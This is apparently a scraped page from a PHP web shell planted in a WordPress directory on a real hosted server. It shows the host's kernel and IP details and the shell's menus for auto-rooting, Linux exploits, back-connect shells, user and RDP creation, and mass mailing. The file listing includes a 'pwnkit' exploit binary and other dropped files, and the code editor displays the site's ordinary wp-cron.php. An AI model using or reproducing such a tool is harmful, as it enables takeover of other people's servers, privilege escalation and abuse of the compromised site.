Linux webd123.cluster006.gra.hosting.ovh.net 5.15.162-ovh-vps-grsec-zfs-classid #1 SMP Mon Jul 15 08:28:44 UTC 2024 x86_64
Apache
: 10.6.40.122 | : 216.73.216.128
Cant Read [ /etc/named.conf ]
5.4.45
zouerate
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
zouerate /
ZOUERATE.COM /
lanewsletter /
[ HOME SHELL ]
Name
Size
Permission
Action
_vti_cnf
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
35
B
-rwxr--r--
.mad-root
0
B
-rw-r--r--
2index.php
3.78
KB
-rw----r--
AAA-zouerate_com_1
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
favicon.ico
533
B
-rwxr--r--
index.php
397
B
-rwxr--r--
license.txt
15.05
KB
-rwxr--r--
pwnkit
10.99
KB
-rwxr-xr-x
radio.php
3.78
KB
-rw----r--
radio.txt
40
B
-rw----r--
readme.html
389
B
-r--r--r--
wp-app.php
33.27
KB
-rwxr--r--
wp-atom.php
555
B
-rwxr--r--
wp-blog-header.php
13.56
KB
-rwxr--r--
wp-comments-post.php
3.02
KB
-rwxr--r--
wp-commentsrss2.php
625
B
-rwxr--r--
wp-config-sample.php
1.53
KB
-rwxr--r--
wp-config.php
1.52
KB
-rw-------
wp-cron.php
1.23
KB
-rwxr--r--
wp-feed.php
661
B
-rwxr--r--
wp-links-opml.php
1.94
KB
-rwxr--r--
wp-load.php
1.9
KB
-rwxr--r--
wp-login.php
18.9
KB
-rwxr--r--
wp-mail.php
6.25
KB
-rwxr--r--
wp-pass.php
487
B
-rwxr--r--
wp-rdf.php
473
B
-rwxr--r--
wp-register.php
316
B
-rwxr--r--
wp-rss.php
484
B
-rwxr--r--
wp-rss2.php
555
B
-rwxr--r--
wp-settings.php
16.77
KB
-rwxr--r--
wp-trackback.php
3.35
KB
-rwxr--r--
xmlrpc.php
73.64
KB
-rwxr--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-cron.php
<?php /** * WordPress Cron Implementation for hosts, which do not offer CRON or for which * the user has not setup a CRON job pointing to this file. * * The HTTP request to this file will not slow down the visitor who happens to * visit when the cron job is needed to run. * * @package WordPress */ ignore_user_abort(true); /** * Tell WordPress we are doing the CRON task. * * @var bool */ define('DOING_CRON', true); /** Setup WordPress environment */ require_once('./wp-load.php'); if ( $_GET['check'] != wp_hash('187425') ) exit; if ( get_option('doing_cron') > time() ) exit; update_option('doing_cron', time() + 30); $crons = _get_cron_array(); $keys = array_keys($crons); if (!is_array($crons) || $keys[0] > time()) return; foreach ($crons as $timestamp => $cronhooks) { if ($timestamp > time()) break; foreach ($cronhooks as $hook => $keys) { foreach ($keys as $key => $args) { $schedule = $args['schedule']; if ($schedule != false) { $new_args = array($timestamp, $schedule, $hook, $args['args']); call_user_func_array('wp_reschedule_event', $new_args); } wp_unschedule_event($timestamp, $hook, $args['args']); do_action_ref_array($hook, $args['args']); } } } update_option('doing_cron', 0); ?>
Close